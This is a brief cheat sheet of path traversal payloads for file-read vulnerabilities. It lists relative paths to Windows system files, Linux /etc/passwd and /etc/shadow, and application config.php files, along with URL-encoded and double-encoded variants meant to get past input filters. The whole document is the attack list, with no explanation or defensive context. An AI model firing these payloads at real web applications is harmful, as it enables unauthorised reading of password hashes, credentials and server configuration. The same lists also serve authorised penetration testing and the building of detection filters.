File Read Vulnerability
Payloads (Windows):
• ..\..\..\..\windows\system32\drivers\etc\hosts
• ..\..\..\..\..\windows\win.ini
• config.php
• ..\config.php
• ..\..\config.php
Payloads (Linux):
• ../../../../etc/passwd
• ../../../../etc/shadow
• ../../config.php
• /etc/passwd
Encoding Bypass:
• ..%2F..%2F..%2Fetc%2Fpasswd
• ..%252F..%252F..%252Fetc%252Fpasswd
• %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd